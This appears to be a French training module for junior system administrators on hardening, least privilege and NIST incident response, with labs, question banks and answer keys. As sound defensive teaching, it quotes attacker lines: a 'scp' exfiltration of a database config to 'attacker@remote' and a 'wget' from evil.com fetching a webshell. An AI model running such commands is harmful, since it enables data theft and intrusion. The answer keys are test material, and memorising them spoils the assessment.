3. <strong>Linux</strong> : <code>systemctl list-units --type=service</code> → désactiver les services inutiles ; <code>ss -tlnp</code> → lister les ports ouverts ; <code>iptables</code>/<code>nftables</code> → pare-feu avec politique par défaut DROP ; <code>ufw</code> (Ubuntu, plus simple) ou <code>firewalld</code> (RHEL/CentOS) comme alternative ; <code>auditd</code> → audit système et traçabilité des actions ; <code>unattended-upgrades</code> → mises à jour automatiques de sécurité.
4. <strong>Windows</strong> : <code>Get-Service</code> → auditer les services ; Windows Defender Firewall → bloquer le trafic entrant non sollicité ; Windows Update → appliquer les correctifs critiques ; désactiver SMBv1, NetBIOS si non utilisé.
5. <strong>Checklist de durcissement minimale</strong> : (a) inventaire des services et ports, (b) suppression des services inutiles, (c) pare-feu restrictif (iptables/nftables ou ufw/firewalld), (d) mises à jour, (e) auditd activé et configuré pour les actions critiques, (f) comptes : suppression des comptes inactifs, verrouillage après N tentatives, (g) SSH : désactiver root login, utiliser des clés.
6. <strong>Bonnes pratiques</strong> : toujours tester le durcissement sur un environnement de test avant la production ; documenter chaque modification pour permettre le rollback ; utiliser des baselines de sécurité reconnues (CIS Benchmarks, ANSSI).</p>
<h3 id="exercices-pratiques-avec-corriges">Exercices pratiques (avec corrigés)<a class="headerlink" href="#exercices-pratiques-avec-corriges" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>Exercice 1 (simple)</strong> : lister les services actifs et les ports ouverts sur ta machine Linux de lab. Proposer la désactivation d'au moins 3 services non essentiels et justifier.</li>
<li><strong>Corrigé détaillé</strong> : <code>systemctl list-units --type=service --state=running</code> + <code>ss -tlnp</code>. Exemples : cups (impression, inutile sur serveur), avahi-daemon (zero-conf, risque info leakage), bluetooth (inutile sur serveur). Justifier chaque désactivation par l'absence de besoin métier.</li>
<li><strong>Exercice 2 (intermédiaire)</strong> : configurer un pare-feu iptables avec politique par défaut DROP, n'autoriser que SSH (port 22), HTTP (80) et HTTPS (443) en entrée, et tout le trafic sortant. Tester la configuration.</li>
<li><strong>Corrigé détaillé</strong> : <code>iptables -P INPUT DROP</code> ; <code>iptables -A INPUT -p tcp --dport 22 -j ACCEPT</code> ; <code>iptables -A INPUT -p tcp --dport 80 -j ACCEPT</code> ; <code>iptables -A INPUT -p tcp --dport 443 -j ACCEPT</code> ; <code>iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT</code> ; <code>iptables -P OUTPUT ACCEPT</code>. Tester : <code>curl localhost:80</code> OK, <code>nmap</code> externe ne voit que 22/80/443. Note : installer <code>nmap</code> avec <code>sudo apt install nmap</code> si absent.</li>
<li><strong>Exercice 3 (avancé)</strong> : rédiger une procédure de durcissement pour un nouveau serveur Linux de production comprenant 10 points de contrôle. Justifier chaque point par le risque qu'il adresse.</li>
<li><strong>Corrigé détaillé</strong> : 1) Désactiver root SSH → empêche brute force root. 2) Authentification par clé SSH uniquement → élimine les attaques par mot de passe. 3) Pare-feu restrictif → limite la surface réseau. 4) Mises à jour automatiques de sécurité → réduit la fenêtre de vulnérabilité. 5) Désactiver les services inutiles → réduit les points d'entrée. 6) Configurer fail2ban → bloque les IP après N échecs. 7) Utiliser sudo avec logs → traçabilité. 8) Désactiver IPv6 si non utilisé → réduit la surface. 9) Partition /tmp en noexec → empêche l'exécution de malwares. 10) Monitoring des logs → détection précoce.</li>
</ol>
<h3 id="nouvelles-abreviations-rencontrees">Nouvelles abréviations rencontrées<a class="headerlink" href="#nouvelles-abreviations-rencontrees" title="Permanent link">&para;</a></h3>
<ul>
<li>CIS | Center for Internet Security | Organisation produisant des benchmarks de durcissement reconnus | Interagit avec les politiques de sécurité, l'audit, les baselines de configuration</li>
<li>ANSSI | Agence Nationale de la Sécurité des Systèmes d'Information | Autorité française de cybersécurité | Interagit avec les guides de durcissement, les recommandations OS, la conformité</li>
</ul>
<h3 id="banque-de-questions-du-module-15">Banque de questions du module (15)<a class="headerlink" href="#banque-de-questions-du-module-15" title="Permanent link">&para;</a></h3>
<ol>
<li>QCM: le durcissement (hardening) vise à... A) accélérer le système B) réduire la surface d'attaque C) ajouter des fonctionnalités</li>
<li>QCM: un service inutilisé doit être... A) laissé actif B) désactivé C) ignoré</li>
<li>QCM: la politique par défaut d'un pare-feu restrictif est... A) ACCEPT B) DROP C) FORWARD</li>
<li>Ouverte: pourquoi désactiver le login root en SSH ?</li>
<li>Ouverte: qu'est-ce que la surface d'attaque d'un système ?</li>
<li>Cas: un serveur web a aussi un serveur FTP actif mais non documenté. Action ?</li>
<li>QCM: <code>ss -tlnp</code> sert à... A) lister les ports en écoute B) supprimer des fichiers C) redémarrer un service</li>
<li>Ouverte: pourquoi tester le durcissement avant la production ?</li>
<li>Cas: après durcissement, une application legacy ne fonctionne plus. Approche ?</li>
<li>QCM: fail2ban sert à... A) bloquer les IP après échecs répétés B) accélérer le réseau C) remplacer le pare-feu</li>
<li>QCM: <code>ufw</code> est un... A) éditeur de texte B) pare-feu simplifié pour Ubuntu C) gestionnaire de paquets</li>
<li>Ouverte: différence entre mise à jour de sécurité et mise à jour fonctionnelle.</li>
<li>Cas: un pentester trouve 3 ports ouverts inattendus. Priorité ?</li>
<li>QCM: un benchmark CIS est... A) un standard de durcissement B) un outil de monitoring C) un langage</li>
<li>Ouverte: comment expliquer le durcissement à un développeur ?</li>
<li>QCM: résultat attendu du module 1 = A) appliquer des principes de durcissement concrets B) mémoriser des checklists C) ignorer la sécurité</li>
</ol>
<hr />
<h2 id="2-gestion-des-acces-et-authentification-4h">2) Gestion des accès et authentification (4h)<a class="headerlink" href="#2-gestion-des-acces-et-authentification-4h" title="Permanent link">&para;</a></h2>
<h3 id="objectifs-dapprentissage_1">Objectifs d'apprentissage<a class="headerlink" href="#objectifs-dapprentissage_1" title="Permanent link">&para;</a></h3>
<ul>
<li>Appliquer le principe du moindre privilège sur les comptes utilisateurs et services.</li>
<li>Différencier authentification, autorisation et audit (AAA).</li>
<li>Configurer et justifier l'usage de MFA/2FA dans un contexte professionnel.</li>
<li>Gérer les accès temporaires et les révocations de façon traçable.</li>
<li>Expliquer la différence entre authentification locale et centralisée (AD, LDAP).</li>
</ul>
<h3 id="contenu-pedagogique_1">Contenu pédagogique<a class="headerlink" href="#contenu-pedagogique_1" title="Permanent link">&para;</a></h3>
<p>La gestion des accès est le premier rempart de sécurité. Une identité compromise est la cause #1 des incidents.</p>
<p>Points clés:
1. <strong>AAA</strong> = Authentification (qui tu es), Autorisation (ce que tu peux faire), Audit/Accounting (traçabilité de ce que tu as fait).
2. <strong>Moindre privilège</strong> : chaque utilisateur ou service ne reçoit que les droits strictement nécessaires à sa fonction. Pas de compte admin utilisé au quotidien.
3. <strong>MFA/2FA</strong> : authentification multi-facteurs — combine quelque chose que tu sais (mot de passe) + quelque chose que tu as (téléphone, token) + quelque chose que tu es (biométrie). Rend le vol de mot de passe insuffisant.
4. <strong>Gestion des accès temporaires</strong> : toujours définir une date d'expiration, un périmètre précis, et une procédure de révocation automatique. Ne jamais laisser un accès temporaire devenir permanent.
5. <strong>Authentification centralisée</strong> (AD, LDAP, SSO) : un point unique de gestion des identités. Avantages : révocation immédiate partout, politiques uniformes, audit centralisé. Inconvénient : si le contrôleur est compromis, tout l'accès est compromis.
6. <strong>Comptes de service</strong> : utiliser des comptes dédiés avec le minimum de droits, mots de passe forts et rotation régulière. Jamais de compte utilisateur humain pour un service.
7. <strong>Politique de mots de passe</strong> : longueur minimale (12+ caractères), complexité modérée, rotation raisonnable (90 jours), pas de réutilisation des N derniers, blocage après N tentatives.</p>
<h3 id="exercices-pratiques-avec-corriges_1">Exercices pratiques (avec corrigés)<a class="headerlink" href="#exercices-pratiques-avec-corriges_1" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>Exercice 1 (simple)</strong> : auditer les comptes utilisateurs sur ton système Linux. Identifier les comptes sans mot de passe, les comptes système, et les comptes avec shell de connexion. Proposer des corrections.</li>
<li><strong>Corrigé détaillé</strong> : <code>cat /etc/passwd</code> + <code>cat /etc/shadow</code> (vérifier comptes sans mot de passe : <code>!!</code> ou <code>*</code>). <code>grep -v nologin /etc/passwd</code> (comptes avec shell). Actions : verrouiller les comptes inactifs (<code>usermod -L</code>), changer les shells en <code>/sbin/nologin</code> pour les comptes qui ne doivent pas se connecter.</li>
<li><strong>Exercice 2 (intermédiaire)</strong> : configurer sudo pour qu'un utilisateur "support" puisse uniquement redémarrer le service nginx et lire les logs, sans autres droits. Tester et documenter.</li>
<li><strong>Corrigé détaillé</strong> : <code>visudo</code> → ajouter <code>support ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/journalctl -u nginx</code>. Tester : <code>sudo systemctl restart nginx</code> OK, <code>sudo systemctl restart apache2</code> refusé, <code>sudo su</code> refusé. Expliquer que cette granularité est le moindre privilège en pratique.</li>
<li><strong>Exercice 3 (avancé)</strong> : concevoir une matrice de droits pour une équipe de 5 personnes (1 admin, 2 développeurs, 2 support) sur un serveur applicatif. Inclure l'accès SSH, sudo, aux logs, à la base de données. Justifier chaque restriction.</li>
<li><strong>Corrigé détaillé</strong> : Admin : SSH + sudo complet + logs + DB admin (besoin de tout pour gérer). Développeurs : SSH restreint + sudo uniquement pour leur application + logs applicatifs + DB read-only (besoin de déployer/débugger, pas de modifier la prod). Support : SSH restreint + sudo uniquement restart services + lecture logs système (besoin de diagnostiquer, pas de modifier le code). Justifier par le moindre privilège adapté à chaque rôle.</li>
</ol>
<h3 id="nouvelles-abreviations-rencontrees_1">Nouvelles abréviations rencontrées<a class="headerlink" href="#nouvelles-abreviations-rencontrees_1" title="Permanent link">&para;</a></h3>
<ul>
<li>AAA | Authentication, Authorization, Accounting | Triade de la gestion des accès | Interagit avec les systèmes d'authentification, les logs, les politiques de sécurité</li>
<li>MFA | <em>(déjà existant, section G)</em> | Authentification multi-facteurs | Interagit avec les comptes, la sécurité des accès, SSO</li>
</ul>
<h3 id="banque-de-questions-du-module-15_1">Banque de questions du module (15)<a class="headerlink" href="#banque-de-questions-du-module-15_1" title="Permanent link">&para;</a></h3>
<ol>
<li>QCM: AAA signifie... A) Authentification, Autorisation, Audit B) Accès, Alerte, Action C) Administrateur, Application, API</li>
<li>QCM: le moindre privilège consiste à donner... A) tous les droits B) le strict nécessaire C) aucun droit</li>
<li>QCM: MFA combine au moins... A) 2 mots de passe B) 2 facteurs différents C) 2 utilisateurs</li>
<li>Ouverte: pourquoi ne pas utiliser un compte admin comme compte quotidien ?</li>
<li>Ouverte: différence entre authentification et autorisation.</li>
<li>Cas: un prestataire a besoin d'un accès temporaire de 48h. Procédure ?</li>
<li>QCM: un compte de service doit avoir... A) les droits admin B) le minimum de droits nécessaires C) le même mot de passe que l'admin</li>
<li>Ouverte: quel est le risque d'un accès temporaire non révoqué ?</li>
<li>Cas: un employé quitte l'entreprise. Tous ses accès étaient centralisés AD. Combien de temps pour tout révoquer ?</li>
<li>QCM: LDAP est un protocole d'... A) accès à un annuaire B) transfert de fichiers C) streaming vidéo</li>
<li>Ouverte: pourquoi la rotation des mots de passe reste-t-elle recommandée ?</li>
<li>Cas: mot de passe faible détecté sur un compte de service. Action prioritaire ?</li>
<li>QCM: le blocage après N tentatives protège contre... A) le brute force B) le phishing C) les virus</li>
<li>Ouverte: comment expliquer le moindre privilège à un manager ?</li>
<li>QCM: résultat attendu du module 2 = A) gérer les accès de façon sécurisée et traçable B) donner tous les droits C) ignorer les comptes</li>
</ol>
<hr />
<h2 id="3-detection-et-reponse-aux-incidents-de-securite-3h">3) Détection et réponse aux incidents de sécurité (3h)<a class="headerlink" href="#3-detection-et-reponse-aux-incidents-de-securite-3h" title="Permanent link">&para;</a></h2>
<h3 id="objectifs-dapprentissage_2">Objectifs d'apprentissage<a class="headerlink" href="#objectifs-dapprentissage_2" title="Permanent link">&para;</a></h3>
<ul>
<li>Distinguer un incident de sécurité d'un incident opérationnel classique.</li>
<li>Appliquer une méthodologie de réponse aux incidents (NIST SP 800-61 : préparation, détection, confinement, éradication, récupération, leçons apprises).</li>
<li>Analyser des logs pour détecter des signes de compromission (brute force, accès inhabituels, élévation de privilèges).</li>
<li>Rédiger un rapport d'incident de sécurité factuel et actionnable.</li>
</ul>
<h3 id="contenu-pedagogique_2">Contenu pédagogique<a class="headerlink" href="#contenu-pedagogique_2" title="Permanent link">&para;</a></h3>
<p>Un incident de sécurité n'est pas un simple bug : c'est une violation ou une tentative de violation de la politique de sécurité.</p>
<p>Points clés:
1. <strong>Cycle de vie d'un incident</strong> (NIST) : Préparation → Détection &amp; Analyse → Confinement, Éradication &amp; Récupération → Activité post-incident (leçons apprises).
2. <strong>Détection</strong> : surveiller les logs (auth.log, syslog, Event Viewer), les alertes IDS/IPS, les anomalies de trafic. Indices de compromission (IOC) : tentatives de connexion massives, connexions à des heures inhabituelles, création de comptes inconnus, processus suspects, trafic sortant anormal.
3. <strong>Confinement</strong> : isoler le système compromis sans le détruire (préserver les preuves). Déconnecter du réseau mais ne pas éteindre (la RAM contient des preuves volatiles).
4. <strong>Éradication</strong> : supprimer la cause racine (malware, backdoor, compte compromis). Corriger la vulnérabilité qui a permis l'intrusion.
5. <strong>Récupération</strong> : remettre le système en production proprement, surveiller renforcé pendant une période.
6. <strong>Rapport d'incident</strong> : quoi (nature), quand (timeline), comment (cause), impact (données/systèmes touchés), actions (confinement, correction), prévention (mesures pour que ça ne se reproduise pas).</p>
<h3 id="exercices-pratiques-avec-corriges_2">Exercices pratiques (avec corrigés)<a class="headerlink" href="#exercices-pratiques-avec-corriges_2" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>Exercice 1 (simple)</strong> : analyser un extrait de auth.log montrant 50 tentatives SSH échouées en 2 minutes. Identifier le type d'attaque, proposer le confinement et la prévention.</li>
<li><strong>Corrigé détaillé</strong> : Attaque = brute force SSH. Confinement : bloquer l'IP source (<code>iptables -A INPUT -s &lt;IP&gt; -j DROP</code> ou fail2ban). Vérifier si une connexion a réussi parmi les tentatives. Prévention : désactiver auth par mot de passe, utiliser des clés SSH, installer fail2ban.</li>
<li><strong>Exercice 2 (intermédiaire)</strong> : un utilisateur "backup" inconnu apparaît dans /etc/passwd avec UID 0. Classifier l'incident, proposer confinement et éradication.</li>
<li><strong>Corrigé détaillé</strong> : Incident = compromission avec escalade de privilèges (création d'un compte root caché). Confinement immédiat : isoler le serveur du réseau. Éradication : supprimer le compte, auditer tous les comptes et fichiers modifiés récemment (<code>find / -mtime -1</code>), vérifier les backdoors (cron, services, clés SSH autorisées), changer tous les mots de passe. Leçons apprises : renforcer le contrôle des créations de comptes, déployer un HIDS.</li>
<li><strong>Exercice 3 (avancé)</strong> : rédiger un rapport d'incident complet pour le scénario "brute force SSH suivi d'une connexion réussie et exfiltration de données". Inclure timeline, impact, actions, recommandations.</li>
<li><strong>Corrigé détaillé</strong> : Rapport structuré : 1) Résumé exécutif (quoi, quand, impact). 2) Timeline précise (première tentative, connexion réussie, exfiltration détectée). 3) Cause racine (mot de passe faible, pas de fail2ban). 4) Impact (données consultées : /etc/shadow, /home/app/config/db.conf → DB compromise). 5) Actions immédiates (isolation, reset mots de passe, rotation clés API, notification). 6) Actions long terme (MFA, clés SSH, fail2ban, audit régulier des auth.log).</li>
</ol>
<h3 id="nouvelles-abreviations-rencontrees_2">Nouvelles abréviations rencontrées<a class="headerlink" href="#nouvelles-abreviations-rencontrees_2" title="Permanent link">&para;</a></h3>
<ul>
<li>NIST | National Institute of Standards and Technology | Institut américain de normalisation (cybersécurité) | Interagit avec les cadres de réponse aux incidents, les standards de sécurité, la conformité</li>
<li>IOC | Indicator of Compromise | Indice de compromission (artefact indiquant une intrusion) | Interagit avec les logs, le monitoring, la réponse aux incidents</li>
<li>IDS | Intrusion Detection System | Système de détection d'intrusion | Interagit avec le réseau, les logs, les alertes</li>
<li>IPS | Intrusion Prevention System | Système de prévention d'intrusion | Interagit avec IDS, le pare-feu, le réseau</li>
</ul>
<h3 id="banque-de-questions-du-module-15_2">Banque de questions du module (15)<a class="headerlink" href="#banque-de-questions-du-module-15_2" title="Permanent link">&para;</a></h3>
<ol>
<li>QCM: la première phase du cycle NIST est... A) confinement B) préparation C) communication</li>
<li>QCM: un IOC est... A) un type de pare-feu B) un indice de compromission C) un langage de script</li>
<li>QCM: face à un serveur compromis, la priorité est... A) l'éteindre immédiatement B) l'isoler du réseau sans l'éteindre C) le laisser en ligne</li>
<li>Ouverte: pourquoi ne pas éteindre un serveur compromis immédiatement ?</li>
<li>Ouverte: différence entre confinement et éradication.</li>
<li>Cas: des connexions SSH réussies sont détectées à 3h du matin depuis une IP étrangère. Première action ?</li>
<li>QCM: un IDS sert à... A) détecter des intrusions B) bloquer automatiquement C) remplacer le pare-feu</li>
<li>Ouverte: que contient un rapport d'incident minimal ?</li>
<li>Cas: fail2ban n'a pas bloqué l'attaquant. Pourquoi possiblement ?</li>
<li>QCM: la phase "leçons apprises" vise à... A) punir les coupables B) éviter la répétition C) supprimer les logs</li>
<li>Ouverte: pourquoi préserver les preuves lors d'un incident ?</li>
<li>Cas: des processus inconnus tournent sous l'utilisateur <code>www-data</code>. Classification ?</li>
<li>QCM: détecter un brute force se fait via... A) les logs d'authentification B) la consommation CPU C) le bruit du ventilateur</li>
<li>Ouverte: comment présenter un incident de sécurité à la direction ?</li>
<li>QCM: résultat attendu du module 3 = A) détecter et répondre méthodiquement à un incident B) paniquer et tout éteindre C) ignorer les logs</li>
</ol>
<hr />
<h2 id="4-labs-incidents-securite-scenarios-realistes-2h">4) Labs incidents sécurité — scénarios réalistes (2h)<a class="headerlink" href="#4-labs-incidents-securite-scenarios-realistes-2h" title="Permanent link">&para;</a></h2>
<h3 id="objectifs-dapprentissage_3">Objectifs d'apprentissage<a class="headerlink" href="#objectifs-dapprentissage_3" title="Permanent link">&para;</a></h3>
<ul>
<li>Appliquer le cycle NIST complet sur des scénarios réalistes.</li>
<li>Corréler des logs multi-sources pour reconstruire une timeline d'attaque.</li>
<li>Produire un rapport d'incident défendable en contexte professionnel.</li>
<li>Renforcer les réflexes de réponse sous contrainte temps.</li>
</ul>
<h3 id="contenu-pedagogique_3">Contenu pédagogique<a class="headerlink" href="#contenu-pedagogique_3" title="Permanent link">&para;</a></h3>
<p>Scénarios de lab (environnement simulé ou sur VM de lab) :</p>
<ol>
<li><strong>Scénario A — Brute force SSH + exfiltration</strong> : un attaquant a bruteforcé SSH, s'est connecté, a exfiltré un fichier de configuration contenant des credentials DB. Tâche : détecter, confiner, éradiquer, documenter.</li>
<li><strong>Scénario B — Élévation de privilèges locale</strong> : un utilisateur standard exploite un sudo mal configuré pour obtenir un shell root. Tâche : identifier l'abus, corriger sudo, auditer les actions root.</li>
<li><strong>Scénario C — Service non sécurisé</strong> : un service web exposé a une faille connue (version obsolète). Un attaquant a déployé un webshell. Tâche : détecter le webshell, confiner, patcher, auditer.</li>
</ol>
<p>Méthode pour chaque scénario : <strong>timeline → IOC → confinement → éradication → récupération → rapport</strong>.</p>
<h3 id="exercices-pratiques-avec-corriges_3">Exercices pratiques (avec corrigés)<a class="headerlink" href="#exercices-pratiques-avec-corriges_3" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>Exercice 1 (simple)</strong> : scénario A — identifier les IOC dans les logs et proposer le confinement immédiat.</li>
<li><strong>Corrigé détaillé</strong> : IOC dans auth.log : tentatives massives puis "Accepted password for user X from IP Y". IOC dans bash_history : <code>cat /home/app/config/db.conf</code>, <code>scp db.conf attacker@remote:/tmp</code>. Confinement : bloquer l'IP, couper l'accès réseau de l'utilisateur compromis, vérifier si l'IP est encore active (<code>ss -tnp</code>).</li>
<li><strong>Exercice 2 (intermédiaire)</strong> : scénario B — auditer sudo après incident, identifier la règle fautive, la corriger, vérifier qu'aucun autre utilisateur n'a le même privilège.</li>
<li><strong>Corrigé détaillé</strong> : <code>cat /var/log/auth.log | grep sudo</code> → trouver la commande exploitée. Vérifier sudoers : <code>visudo -c</code> → repérer les règles trop permissives (ex: <code>ALL=(ALL) NOPASSWD: ALL</code> au lieu d'une commande spécifique). Corriger avec une règle granulaire. Tester : la commande abusive est refusée. Vérifier tous les utilisateurs dans sudoers.</li>
<li><strong>Exercice 3 (avancé)</strong> : synthèse — rédiger un rapport d'incident complet pour le scénario C, incluant timeline précise, IOC identifiés, actions NIST, recommandations de durcissement.</li>
<li><strong>Corrigé détaillé</strong> : Rapport complet avec sections : (1) Résumé, (2) Timeline, (3) IOC (fichier webshell, logs d'accès suspects, processus inconnu), (4) Confinement (service arrêté, serveur isolé), (5) Éradication (patch version, suppression webshell, reset credentials), (6) Récupération (redéploiement propre, monitoring renforcé), (7) Recommandations (WAF, mise à jour automatique, audit trimestriel).</li>
</ol>
<h3 id="nouvelles-abreviations-rencontrees_3">Nouvelles abréviations rencontrées<a class="headerlink" href="#nouvelles-abreviations-rencontrees_3" title="Permanent link">&para;</a></h3>
<ul>
<li>WAF | Web Application Firewall | Pare-feu applicatif web protégeant contre les attaques HTTP | Interagit avec le serveur web, les logs, les IDS/IPS</li>
<li>CVE | Common Vulnerabilities and Exposures | Identifiant standard pour une vulnérabilité connue | Interagit avec les bases de données de failles, les correctifs, le scanning</li>
</ul>
<h3 id="banque-de-questions-du-module-15_3">Banque de questions du module (15)<a class="headerlink" href="#banque-de-questions-du-module-15_3" title="Permanent link">&para;</a></h3>
<ol>
<li>QCM: un lab incident J15 simule... A) un cas réel de compromission B) un exercice sans conséquence C) un cours théorique pur</li>
<li>QCM: la première étape face à un incident confirmé est... A) communiquer sur Twitter B) confiner C) ignorer</li>
<li>QCM: un webshell est... A) un outil légitime B) un script malveillant déposé sur un serveur web C) un type de pare-feu</li>
<li>Ouverte: pourquoi la timeline est-elle cruciale dans un rapport d'incident ?</li>
<li>Ouverte: différence entre un IOC et une vulnérabilité.</li>
<li>Cas: des logs montrent <code>wget http://evil.com/shell.php</code>. Action immédiate ?</li>
<li>QCM: CVE signifie... A) Common Vulnerabilities and Exposures B) Central Virus Engine C) Critical Virtual Environment</li>
<li>Ouverte: pourquoi ne pas supprimer les logs après un incident ?</li>
<li>Cas: le serveur est isolé mais l'attaquant semble toujours actif. Explication possible ?</li>
<li>QCM: un rapport d'incident doit être... A) factuel et actionnable B) émotionnel C) vide</li>
<li>Ouverte: comment prioriser plusieurs incidents simultanés ?</li>
<li>Cas: même type d'incident se reproduit pour la 3e fois. Problème ?</li>
<li>QCM: objectif du module 4 = A) réflexes de réponse aux incidents B) mémorisation NIST C) théorie sans pratique</li>
<li>Ouverte: comment présenter un incident résolu en entretien ?</li>
<li>QCM: résultat attendu = A) réponse méthodique documentée B) panique et reboot C) suppression des preuves</li>
</ol>
<hr />
<h2 id="5-banque-de-questions-suivi-p1-1h">5) Banque de questions + suivi P1 (1h)<a class="headerlink" href="#5-banque-de-questions-suivi-p1-1h" title="Permanent link">&para;</a></h2>
<h3 id="objectifs-dapprentissage_4">Objectifs d'apprentissage<a class="headerlink" href="#objectifs-dapprentissage_4" title="Permanent link">&para;</a></h3>
<ul>
<li>Valider les acquis J15 en format test.</li>
<li>Transformer J15 en preuve employable immédiate.</li>
</ul>
<h3 id="contenu-pedagogique_4">Contenu pédagogique<a class="headerlink" href="#contenu-pedagogique_4" title="Permanent link">&para;</a></h3>
<ul>
<li>40 min test mixte J15.</li>
<li>20 min correction + plan J16.</li>
</ul>
<h3 id="exercices-pratiques-avec-corriges_4">Exercices pratiques (avec corrigés)<a class="headerlink" href="#exercices-pratiques-avec-corriges_4" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>Exercice 1 (simple)</strong> : rédiger une ligne CV intégrant une compétence sécurité J15.</li>
<li><strong>Corrigé détaillé</strong> : "Application des principes de durcissement et de réponse aux incidents sur serveurs Linux et Windows" ou "Détection et résolution d'incidents de sécurité via analyse de logs et application du cycle NIST".</li>
<li><strong>Exercice 2 (intermédiaire)</strong> : pitch 60s "Pourquoi la sécurité est importante même pour un admin système junior".</li>
<li><strong>Corrigé détaillé</strong> : L'admin a les clés de l'infrastructure → première cible. Un compte admin compromis = toute l'infra compromise. Moindre privilège, durcissement, détection → des réflexes qui protègent l'entreprise au quotidien, pas seulement en cas de crise.</li>
<li><strong>Exercice 3 (avancé)</strong> : plan J16 en 3 priorités mesurables.</li>
<li><strong>Corrigé détaillé</strong> : 1) Comprendre les outils de supervision (Nagios, Zabbix, Prometheus). 2) Mettre en place une sonde basique et interpréter une alerte. 3) Préparer un argumentaire "supervision = proactivité, pas coût".</li>
</ol>
<h3 id="nouvelles-abreviations-rencontrees_4">Nouvelles abréviations rencontrées<a class="headerlink" href="#nouvelles-abreviations-rencontrees_4" title="Permanent link">&para;</a></h3>
<ul>
<li>Aucune nouvelle abréviation technique.</li>
</ul>
<h3 id="banque-de-questions-du-module-15_4">Banque de questions du module (15)<a class="headerlink" href="#banque-de-questions-du-module-15_4" title="Permanent link">&para;</a></h3>
<ol>
<li>QCM: objectif final J15 = A) compétences sécurité opérationnelles prouvées B) théorie uniquement C) aucun livrable</li>
<li>Ouverte: meilleure preuve de compétence sécurité à montrer à un recruteur ?</li>
<li>QCM: ligne CV sécurité forte = A) verbe d'action + contexte + impact B) "j'aime la sécurité" C) liste vide</li>
<li>Cas: tu as détecté et résolu un incident seul. Comment le valoriser en entretien ?</li>
<li>Ouverte: comment relier J15 au poste d'admin système junior ?</li>
<li>QCM: plan J16 doit être... A) mesurable B) flou C) optionnel</li>
<li>Ouverte: quelle preuve sécurité publier sur le portfolio ce soir ?</li>
<li>QCM: la correction immédiate en sécurité sert à... A) ancrer les bons réflexes B) repousser C) copier</li>
<li>Cas: le recruteur te demande "Que fais-tu si tu détectes un brute force ?"</li>
<li>QCM: preuve solide en sécurité = A) rapport d'incident documenté + logs B) promesse C) absence totale d'incident</li>
<li>Ouverte: pourquoi montrer un rapport d'incident (anonymisé) sur ton portfolio ?</li>
<li>Cas: "Vous n'avez pas de certification en sécurité, pourquoi vous faire confiance ?"</li>
<li>QCM: remédiation utile = A) corriger la lacune précise B) tout recommencer C) abandonner</li>
<li>Ouverte: indicateur de progression J15 pertinent ?</li>
<li>QCM: résultat P1 réussi = A) portfolio enrichi + CV sécurité B) rien C) théorie sans preuve</li>
</ol>
<hr />
<h2 id="validation-qualite-j15-anti-superficiel">Validation qualité J15 (anti-superficiel)<a class="headerlink" href="#validation-qualite-j15-anti-superficiel" title="Permanent link">&para;</a></h2>
<h3 id="livrables-obligatoires-fin-de-j15">Livrables obligatoires fin de J15<a class="headerlink" href="#livrables-obligatoires-fin-de-j15" title="Permanent link">&para;</a></h3>
<ol>
<li>1 procédure de durcissement Linux documentée (10 points de contrôle, risques adressés).</li>
<li>1 matrice de droits argumentée (admin, dev, support) pour un serveur applicatif.</li>
<li>1 rapport d'incident complet (brute force SSH ou webshell) avec timeline, IOC, actions NIST.</li>
<li>3 labs incidents résolus (brute force, élévation de privilèges, webshell) avec RCA par incident.</li>
<li>1 preuve portfolio (rapport anonymisé ou SOP de durcissement) + mise à jour CV ligne sécurité.</li>
</ol>
<h3 id="grille-devaluation-rapide-100-points">Grille d'évaluation rapide (100 points)<a class="headerlink" href="#grille-devaluation-rapide-100-points" title="Permanent link">&para;</a></h3>
<ul>
<li>Maîtrise du durcissement systèmes (Linux + Windows, pare-feu, services) : <strong>25 pts</strong></li>
<li>Gestion des accès (moindre privilège, AAA, MFA, matrices de droits) : <strong>25 pts</strong></li>
<li>Détection et réponse aux incidents (cycle NIST, IOC, logs, rapport) : <strong>25 pts</strong></li>
<li>Qualité des labs et des rapports (rigueur, traçabilité) : <strong>15 pts</strong></li>
<li>Communication technique employabilité : <strong>10 pts</strong></li>
</ul>
<h3 id="seuil-attendu">Seuil attendu<a class="headerlink" href="#seuil-attendu" title="Permanent link">&para;</a></h3>
<ul>
<li><strong>&gt;= 80/100</strong> : J15 validé, passage normal J16.</li>
<li><strong>65-79/100</strong> : validé sous remédiation ciblée 24h.</li>
<li><strong>&lt; 65/100</strong> : consolidation sécurité requise avant J16.</li>
</ul>
<hr />
<h2 id="corriges-guides-mode-tuteur-reponses-attendues">Corrigés guidés — mode tuteur (réponses attendues)<a class="headerlink" href="#corriges-guides-mode-tuteur-reponses-attendues" title="Permanent link">&para;</a></h2>
<h3 id="a-corrige-module-1-durcissement">A. Corrigé — Module 1 (Durcissement)<a class="headerlink" href="#a-corrige-module-1-durcissement" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>B</strong></li>
<li><strong>B</strong></li>
<li><strong>B</strong></li>
<li>Pour empêcher les attaques par brute force ciblant root directement, et forcer l'utilisation de sudo pour la traçabilité.</li>
<li>Ensemble des points d'entrée exploitables d'un système : ports ouverts, services, comptes utilisateurs, applications exposées.</li>
<li>Vérifier si le FTP est utilisé. Si non, le désactiver et documenter. Si oui, le sécuriser (SFTP au lieu de FTP, restreindre les IP sources).</li>
<li><strong>A</strong></li>
<li>Pour éviter de casser un service en production. Un durcissement mal testé peut bloquer une application critique.</li>
<li>Identifier le service bloqué via les logs → ajuster la règle de pare-feu ou la configuration durcie pour autoriser le strict nécessaire → re-tester.</li>
<li><strong>A</strong></li>
<li>Mise à jour de sécurité = corrige une vulnérabilité (urgente). Mise à jour fonctionnelle = ajoute/modifie des fonctionnalités (moins urgente).</li>
<li>Les fermer immédiatement s'ils ne sont pas nécessaires ; s'ils le sont, les documenter et les sécuriser (restreindre les IP sources, utiliser TLS).</li>
<li><strong>A</strong></li>
<li>"Comme fermer à clé toutes les portes et fenêtres d'une maison, et ne laisser ouvert que ce qui est vraiment nécessaire."</li>
<li><strong>A</strong></li>
</ol>
<h3 id="b-corrige-module-2-gestion-des-acces">B. Corrigé — Module 2 (Gestion des accès)<a class="headerlink" href="#b-corrige-module-2-gestion-des-acces" title="Permanent link">&para;</a></h3>
<ol>
